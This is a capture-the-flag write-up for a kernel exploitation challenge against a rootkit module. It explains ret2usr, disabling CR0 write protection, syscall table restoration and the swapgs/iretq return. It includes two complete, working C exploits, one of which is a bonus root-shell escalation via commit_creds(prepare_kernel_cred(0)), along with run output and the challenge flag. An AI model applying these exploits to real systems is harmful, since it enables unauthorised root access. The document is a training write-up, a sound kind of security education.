TL;DR
Same rootkit, harder exploitation. No SMEP/SMAP means we can execute userspace code from kernel context (ret2usr). Overflow the buffer → execute our shellcode → disable CR0 write protection → restore syscall table → iretq back to userspace. Oh, and we can also get root shell as a bonus.
Tags: pwn kernel rootkit ret2usr privilege-escalation CR0 iretq SMEP-bypass
Challenge Files: Kernel module (rootkit), same as before
Note: This writeup assumes you’ve read the previous “Hello Rootkitty” challenge. I’ll focus on the advanced techniques specific to the “Harder” version without repeating the basics.
What’s Different?
The vulnerability is the same (buffer overflow in strcpy), but now we have:
New constraints:
- KASLR is enabled (addresses randomized)
- Write Protection (WP bit in CR0) is active
- Need to return cleanly to userspace
But also new opportunities:
- SMEP/SMAP are disabled - we can execute userspace code from kernel!
- We have
/proc/kallsymsaccess for KASLR bypass
This opens up ret2usr attacks - one of the classic kernel exploitation techniques.
Understanding the Syscall Table
Before diving into exploitation, let’s understand what we’re attacking.
How Syscalls Work
A syscall is how userspace programs ask the kernel to do privileged operations:
┌─────────────────────────────────────────┐
│ USERSPACE (Ring 3) │
│ │
│ Program: read(fd, buffer, size) │
│ │ │
│ ▼ │
│ syscall(0, ...) │
└──────────────│──────────────────────────┘
│
│ Transition Ring 3 → Ring 0
▼
┌─────────────────────────────────────────┐
│ KERNEL SPACE (Ring 0) │
│ │
│ Syscall Table: │
│ ┌────────────────────────┐ │
│ │ [0] → sys_read │ │
│ │ [1] → sys_write │ │
│ │ [2] → sys_open │ │
│ │ [3] → sys_close │ │
│ │ ... │ │
│ │ [6] → sys_lstat │ (0x06) │
│ │ [78] → sys_getdents │ (0x4e) │
│ │ ... │ │
│ │ [217]→ sys_getdents64 │ (0xd9) │
│ └────────────────────────┘ │
└─────────────────────────────────────────┘
The syscall table is just an array of function pointers:
// Simplified Linux kernel code
void *sys_call_table[] = {
[0] = sys_read,
[1] = sys_write,
[6] = sys_lstat, // 0x06
[78] = sys_getdents, // 0x4e (0x270 bytes offset)
[217] = sys_getdents64, // 0xd9 (0x6c8 bytes offset)
};
Rootkit Syscall Hooking
The rootkit modifies these pointers to intercept calls:
// Normal state
sys_call_table[217] = sys_getdents64;
// After infection
sys_call_table[217] = malicious_getdents64;
// Now when you do ls:
ls → getdents64() → malicious_getdents64()
→ filters results
→ hides files
→ calls real sys_getdents64
Write Protection (CR0 Register)
The syscall table is normally read-only. The WP (Write Protect) bit in the CR0 register prevents writes:
// Disable WP (bit 16 of CR0)
mov rax, cr0
and rax, ~0x10000 // Clear bit 16
mov cr0, rax
// Now we can modify the table
sys_call_table[217] = evil_function;
// Re-enable WP
mov rax, cr0
or rax, 0x10000 // Set bit 16
mov cr0, rax
This is exactly what rootkits do - and what we’ll need to do to restore the table.
The Challenge
Same three hooked syscalls as before:
| Syscall | Number | Hex | Table Offset | Purpose |
|---|---|---|---|---|
lstat |
6 | 0x06 | 0x30 | File metadata |
getdents |
78 | 0x4e | 0x270 | List directory (32-bit) |
getdents64 |
217 | 0xd9 | 0x6c8 | List directory (64-bit) |
The vulnerability is still the strcpy buffer overflow - offset is still 102 bytes to RIP.
Active Protections
| Protection | Status | Bypass Method |
|---|---|---|
| KASLR | Enabled | Read /proc/kallsyms |
| WP (CR0) | Enabled | Disable in shellcode |
| SMEP | Disabled | Ret2usr possible! |
| SMAP | Disabled | User memory accessible from kernel |
The lack of SMEP/SMAP is the game changer here.
What is SMEP/SMAP?
SMEP (Supervisor Mode Execution Prevention):
- Prevents kernel from executing code in userspace memory
- Without it: we can put our shellcode in userspace and jump to it from kernel
SMAP (Supervisor Mode Access Prevention):
- Prevents kernel from accessing userspace memory
- Without it: kernel can read/write our userspace variables
Impact: With both disabled, we can execute userspace code with kernel privileges (ret2usr).
Exploitation Strategy
Our approach will be different from the basic version:
- Bypass KASLR - Parse
/proc/kallsymsfor kernel base address - Write userspace shellcode - Function that restores the syscall table
- Overflow buffer - Same technique, offset 102
- Return to userspace - Use shellcode to fix table, then return cleanly
- iretq back - Proper transition from kernel to userspace
Why This is Harder
Unlike the first version where we just called cleanup_module(), now we need to:
- Manually manipulate CR0 to disable write protection
- Write directly to the syscall table
- Use
iretqinstruction to return to userspace properly - Save and restore CPU context (CS, SS, RSP, RFLAGS)
Step 1: KASLR Bypass
Kernel addresses randomize on each boot. We need to read them at runtime:
unsigned long resolve_kernel_symbol(const char *symbol_name) {
FILE *kallsyms = fopen("/proc/kallsyms", "r");
if (!kallsyms) return 0;
char buffer[512], current_symbol[256];
unsigned long symbol_addr = 0;
// Format: <address> <type> <symbol>
// Example: ffffffffa2800000 T _text
while (fgets(buffer, sizeof(buffer), kallsyms)) {
if (sscanf(buffer, "%lx %*c %s", &symbol_addr, current_symbol) == 2) {
if (strcmp(current_symbol, symbol_name) == 0) {
fclose(kallsyms);
return symbol_addr;
}
}
}
fclose(kallsyms);
return 0;
}
// Usage
unsigned long kbase = resolve_kernel_symbol("_text");
unsigned long syscall_table = kbase + 0x8001a0;
Step 2: Save Userspace Context
Before triggering the exploit, we need to save our userspace CPU state for later return:
unsigned long saved_cs, saved_ss, saved_rflags, saved_rsp;
void capture_userspace_context() {
asm volatile(
"mov %%cs, %0;" // Code Segment
"mov %%ss, %1;" // Stack Segment
"mov %%rsp, %2;" // Stack Pointer
"pushfq;" // Push RFLAGS
"pop %3;" // Pop into variable
: "=r"(saved_cs), "=r"(saved_ss),
"=r"(saved_rsp), "=r"(saved_rflags)
);
}
Why? The iretq instruction needs these values to properly return from kernel to userspace.
Step 3: The Restore Shellcode
This is where the magic happens. Our shellcode runs in kernel context:
void restore_syscall_table() {
unsigned long *sys_table = (unsigned long *)(kbase + 0x8001a0);
// 1. Disable Write Protection (clear bit 16 of CR0)
asm volatile(
"mov %%cr0, %%rax;"
"and $~0x10000, %%rax;" // Clear WP bit
"mov %%rax, %%cr0;"
::: "rax"
);
// 2. Restore original syscalls
sys_table[217] = kbase + 0xc7610; // sys_getdents64
sys_table[78] = kbase + 0xc7710; // sys_getdents
sys_table[6] = kbase + 0xbad30; // sys_lstat
// 3. Re-enable Write Protection (set bit 16)
asm volatile(
"mov %%cr0, %%rax;"
"or $0x10000, %%rax;" // Set WP bit
"mov %%rax, %%cr0;"
::: "rax"
);
// 4. Return to userspace via iretq
// iretq pops in order: RIP, CS, RFLAGS, RSP, SS
asm volatile(
"swapgs;" // Swap GS (kernel ↔ user)
"mov %0, %%r14; push %%r14;" // SS
"mov %1, %%r14; push %%r14;" // RSP
"mov %2, %%r14; push %%r14;" // RFLAGS
"mov %3, %%r14; push %%r14;" // CS
"mov %4, %%r14; push %%r14;" // RIP
"iretq;"
:
: "m"(saved_ss), "m"(saved_rsp), "m"(saved_rflags),
"m"(saved_cs), "r"(cleanup_and_exit)
: "r14"
);
}
void cleanup_and_exit() {
// Back in userspace now!
exit(EXIT_SUCCESS);
}
Understanding swapgs + iretq
swapgs:
- Swaps the GS register base between kernel and user values
- Necessary for proper context switching
- Without it: GS corruption leads to kernel panic
iretq (Interrupt Return):
- Privileged instruction that returns from an interrupt/exception
- Pops 5 values from stack: RIP, CS, RFLAGS, RSP, SS
- Transitions from Ring 0 (kernel) to Ring 3 (userspace)
- Without it: we’d stay in kernel mode and crash
Why not just ret?
retonly pops RIP - doesn’t restore full CPU state- We’d return to userspace with kernel-mode CS/SS
- First syscall or privilege check would trigger a fault
Step 4: Build the Payload
int main() {
char filename[256];
char buffer[256];
// 1. Bypass KASLR
kbase = resolve_kernel_symbol("_text");
printf("[+] Kernel base: 0x%lx\n", kbase);
// 2. Save context for iretq
capture_userspace_context();
// 3. Build exploit filename
strcpy(filename, "ecsc_flag_");
memset(filename + 10, 'B', 102); // Padding to RIP
// 4. ROP chain
unsigned long *rop = (unsigned long *)(filename + 112);
rop[0] = kbase + 0x02fd70; // ret (stack alignment)
rop[1] = (unsigned long)restore_syscall_table; // our shellcode
// 5. Create malicious file
int fd = open(filename, O_RDWR | O_CREAT, 0644);
close(fd);
// 6. Trigger vulnerability
fd = open(".", O_RDONLY | O_DIRECTORY);
syscall(SYS_getdents, fd, buffer, 256);
close(fd);
return 0;
}
Execution Flow
Here’s what happens when we trigger the exploit:
1. Create file: ecsc_flag_BBB...[ret][shellcode_addr]
↓
2. syscall(SYS_getdents) → kernel calls ecsc_sys_getdents()
↓
3. strcpy(buffer, filename) → OVERFLOW overwrites return address
↓
4. Function returns → RIP = restore_syscall_table
↓
5. Shellcode executes (in kernel context):
mov cr0, rax; and rax, ~0x10000; mov rax, cr0 ← Disable WP
sys_table[217] = sys_getdents64 ← Restore entries
sys_table[78] = sys_getdents
sys_table[6] = sys_lstat
mov cr0, rax; or rax, 0x10000; mov rax, cr0 ← Enable WP
swapgs ← Prep GS for userspace
push SS/RSP/RFLAGS/CS/RIP ← Setup stack for iretq
iretq ← Return to userspace
↓
6. cleanup_and_exit() executes → exit(0)
↓
7. Rootkit disabled! Files are visible
Full Exploit Code
// Compilation: gcc -o pwn pwn.c -static -no-pie -O0
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
// Kernel offsets (find via reverse engineering or trial)
#define SYSCALL_TABLE_OFFSET 0x8001a0
#define GETDENTS64_OFFSET 0xc7610
#define GETDENTS_OFFSET 0xc7710
#define LSTAT_OFFSET 0xbad30
#define RET_GADGET_OFFSET 0x02fd70
#define OVERFLOW_OFFSET 102
static unsigned long kbase = 0;
static unsigned long saved_cs, saved_ss, saved_rflags, saved_rsp;
unsigned long resolve_kernel_symbol(const char *symbol_name) {
FILE *kallsyms = fopen("/proc/kallsyms", "r");
if (!kallsyms) return 0;
char buffer[512], current_symbol[256];
unsigned long symbol_addr = 0;
while (fgets(buffer, sizeof(buffer), kallsyms)) {
if (sscanf(buffer, "%lx %*c %s", &symbol_addr, current_symbol) == 2) {
if (strcmp(current_symbol, symbol_name) == 0) {
fclose(kallsyms);
return symbol_addr;
}
}
}
fclose(kallsyms);
return 0;
}
void capture_userspace_context() {
asm volatile(
"mov %%cs, %0;"
"mov %%ss, %1;"
"mov %%rsp, %2;"
"pushfq;"
"pop %3;"
: "=r"(saved_cs), "=r"(saved_ss),
"=r"(saved_rsp), "=r"(saved_rflags)
);
}
void cleanup_and_exit() {
exit(EXIT_SUCCESS);
}
void restore_syscall_table() {
unsigned long *sys_table = (unsigned long *)(kbase + SYSCALL_TABLE_OFFSET);
// Disable Write Protection
asm volatile(
"mov %%cr0, %%rax;"
"and $~0x10000, %%rax;"
"mov %%rax, %%cr0;"
::: "rax"
);
// Restore hooked syscalls
sys_table[217] = kbase + GETDENTS64_OFFSET;
sys_table[78] = kbase + GETDENTS_OFFSET;
sys_table[6] = kbase + LSTAT_OFFSET;
// Re-enable Write Protection
asm volatile(
"mov %%cr0, %%rax;"
"or $0x10000, %%rax;"
"mov %%rax, %%cr0;"
::: "rax"
);
// Return to userspace
asm volatile(
"swapgs;"
"mov %0, %%r14; push %%r14;" // SS
"mov %1, %%r14; push %%r14;" // RSP
"mov %2, %%r14; push %%r14;" // RFLAGS
"mov %3, %%r14; push %%r14;" // CS
"mov %4, %%r14; push %%r14;" // RIP
"iretq;"
:
: "m"(saved_ss), "m"(saved_rsp), "m"(saved_rflags),
"m"(saved_cs), "r"(cleanup_and_exit)
: "r14"
);
}
int main() {
char filename[256];
char buffer[256];
int fd;
// Step 1: Bypass KASLR
kbase = resolve_kernel_symbol("_text");
if (!kbase) {
fprintf(stderr, "[-] Failed to resolve kernel base\n");
return EXIT_FAILURE;
}
printf("[+] Kernel base: 0x%lx\n", kbase);
printf("[+] Syscall table: 0x%lx\n", kbase + SYSCALL_TABLE_OFFSET);
// Step 2: Save userspace context
capture_userspace_context();
// Step 3: Build payload
memset(filename, 0, sizeof(filename));
strcpy(filename, "ecsc_flag_");
int prefix_len = strlen(filename);
memset(filename + prefix_len, 'B', OVERFLOW_OFFSET);
// Step 4: ROP chain
unsigned long *rop = (unsigned long *)(filename + prefix_len + OVERFLOW_OFFSET);
rop[0] = kbase + RET_GADGET_OFFSET;
rop[1] = (unsigned long)restore_syscall_table;
printf("[+] Shellcode @ 0x%lx\n", (unsigned long)restore_syscall_table);
printf("[+] Weaponizing filename...\n");
// Step 5: Create malicious file
fd = open(filename, O_RDWR | O_CREAT, 0644);
if (fd < 0) {
perror("[-] File creation failed");
return EXIT_FAILURE;
}
close(fd);
printf("[+] Triggering vulnerability...\n");
// Step 6: Trigger overflow
fd = open(".", O_RDONLY | O_DIRECTORY);
if (fd < 0) {
perror("[-] Directory open failed");
return EXIT_FAILURE;
}
syscall(SYS_getdents, fd, buffer, sizeof(buffer));
close(fd);
fprintf(stderr, "[-] Exploit failed\n");
return EXIT_FAILURE;
}
Execution
$ cd /mnt/share
$ gcc -o pwn pwn.c -static -no-pie -O0
$ ./pwn
[+] Kernel base: 0xffffffffae800000
[+] Syscall table: 0xffffffffaf0001a0
[+] Shellcode @ 0x4019d5
[+] Weaponizing filename...
[+] Triggering vulnerability...
$ cd /
$ cat ecsc_flag_*
ECSC{2e94068aa85e0a7a21163fcad4566a0f92fa08dcaf874a5e34fba4612cfd7eaa}
Success!
BONUS: Root Shell Exploitation
Why just restore the syscall table when we can get root?
Kernel Privilege Functions
Linux kernel provides two critical functions for privilege management:
// Creates credentials with specified UID/GID (0 = root)
struct cred *prepare_kernel_cred(struct task_struct *daemon);
// Applies credentials to current process
int commit_creds(struct cred *new);
Magic combo: commit_creds(prepare_kernel_cred(0)) gives us UID/GID 0!
Root Shellcode
void shellcode() {
// commit_creds(prepare_kernel_cred(0))
asm(
".intel_syntax noprefix;"
"xor rdi, rdi;" // rdi = 0 (NULL)
"mov rax, %0;" // rax = prepare_kernel_cred
"call rax;" // prepare_kernel_cred(0)
"mov rdi, rax;" // rdi = result (new creds)
"mov rax, %1;" // rax = commit_creds
"call rax;" // commit_creds(new_creds)
".att_syntax;"
:
: "r"(prepare_kernel_cred), "r"(commit_creds)
: "rax", "rdi", "rdx", "rcx", "rsi", "r8", "r9", "r10", "r11"
);
// Return to userspace
asm(
".intel_syntax noprefix;"
"swapgs;"
"mov r15, user_ss;"
"push r15;"
"mov r15, user_sp;"
"push r15;"
"mov r15, user_rflags;"
"push r15;"
"mov r15, user_cs;"
"push r15;"
"mov r15, %0;"
"push r15;"
"iretq;"
".att_syntax;"
:
: "r"(spawn_shell)
: "r15"
);
}
void spawn_shell() {
printf("[+] UID: %d\n", getuid());
if (getuid() == 0) {
printf("[+] ROOT SHELL!\n");
}
execve("/bin/sh", NULL, NULL);
exit(0);
}
Root Exploit (Full Code)
// gcc -o root root.c -static -no-pie -O0
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#define OFFSET 102
#define GADGET_RET_OFFSET 0x02fd70
unsigned long user_cs, user_ss, user_rflags, user_sp;
unsigned long prepare_kernel_cred;
unsigned long commit_creds;
unsigned long kernel_base;
void save_state() {
asm(
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
}
void spawn_shell() {
printf("[+] UID: %d\n", getuid());
if (getuid() == 0) {
printf("[+] ROOT SHELL OBTAINED!\n");
}
char *argv[] = {"/bin/sh", NULL};
execve("/bin/sh", argv, NULL);
exit(0);
}
void shellcode() {
// commit_creds(prepare_kernel_cred(0))
asm(
"xor %%rdi, %%rdi;"
"mov %%rax, %0;"
"call *%%rax;"
"mov %%rdi, %%rax;"
"mov %%rax, %1;"
"call *%%rax;"
:
: "r"(prepare_kernel_cred), "r"(commit_creds)
: "rax", "rdi", "rdx", "rcx", "rsi", "r8", "r9", "r10", "r11"
);
// Return to userspace
asm(
"swapgs;"
"mov %%r15, %0; push %%r15;"
"mov %%r15, %1; push %%r15;"
"mov %%r15, %2; push %%r15;"
"mov %%r15, %3; push %%r15;"
"mov %%r15, %4; push %%r15;"
"iretq;"
:
: "m"(user_ss), "m"(user_sp), "m"(user_rflags),
"m"(user_cs), "r"(spawn_shell)
: "r15"
);
}
unsigned long get_symbol(const char *sym) {
FILE *f = fopen("/proc/kallsyms", "r");
if (!f) return 0;
char line[256], name[128];
unsigned long addr = 0;
while (fgets(line, sizeof(line), f)) {
if (sscanf(line, "%lx %*c %s", &addr, name) == 2) {
if (!strcmp(name, sym)) {
fclose(f);
return addr;
}
}
}
fclose(f);
return 0;
}
int main() {
char name[200];
unsigned long *rop;
// Resolve symbols
kernel_base = get_symbol("_text");
prepare_kernel_cred = get_symbol("prepare_kernel_cred");
commit_creds = get_symbol("commit_creds");
if (!kernel_base || !prepare_kernel_cred || !commit_creds) {
printf("[-] Failed to resolve symbols\n");
return 1;
}
printf("[+] kernel_base: 0x%lx\n", kernel_base);
printf("[+] prepare_kernel_cred: 0x%lx\n", prepare_kernel_cred);
printf("[+] commit_creds: 0x%lx\n", commit_creds);
printf("[+] shellcode: 0x%lx\n", (unsigned long)shellcode);
save_state();
// Build payload
memset(name, 0, sizeof(name));
strcpy(name, "ecsc_flag_");
memset(name + 10, 'A', OFFSET);
rop = (unsigned long *)(name + 10 + OFFSET);
rop[0] = kernel_base + GADGET_RET_OFFSET;
rop[1] = (unsigned long)shellcode;
printf("[+] Triggering privilege escalation...\n");
// Trigger
int fd = open(name, O_RDWR | O_CREAT, 0644);
close(fd);
fd = open(".", O_RDONLY);
syscall(SYS_getdents, fd, name, 200);
printf("[-] Still here\n");
return 0;
}
Root Shell Demo
$ id
uid=1000(user) gid=1000(user)
$ ./root
[+] kernel_base: 0xffffffffa2800000
[+] prepare_kernel_cred: 0xffffffffa28ab540
[+] commit_creds: 0xffffffffa28ab1e0
[+] shellcode: 0x401b3f
[+] Triggering privilege escalation...
[+] UID: 0
# id
uid=0(root) gid=0(root)
Why Root Method Works
- prepare_kernel_cred(0) creates a
credstructure with UID/GID/capabilities = 0 - commit_creds(new_cred) applies these credentials to current process
- iretq to spawn_shell() - process inherits root credentials
- getuid() returns 0 - we’re root!
No need to touch CR0 or syscall table - we’re just calling legitimate kernel functions.
Protection mechanisms:
| Protection | If Enabled | If Disabled |
|---|---|---|
| SMEP | Blocks ret2usr | Userspace code executable from kernel |
| SMAP | Blocks user memory access | Kernel can read/write userspace |
| KASLR | Randomizes addresses | Fixed addresses |
| WP (CR0) | Syscall table read-only | Can be modified |
Key insights:
- ret2usr is powerful but requires SMEP to be disabled
- iretq is necessary for clean kernel-to-user transitions
Flag
ECSC{2e94068aa85e0a7a21163fcad4566a0f92fa08dcaf874a5e34fba4612cfd7eaa}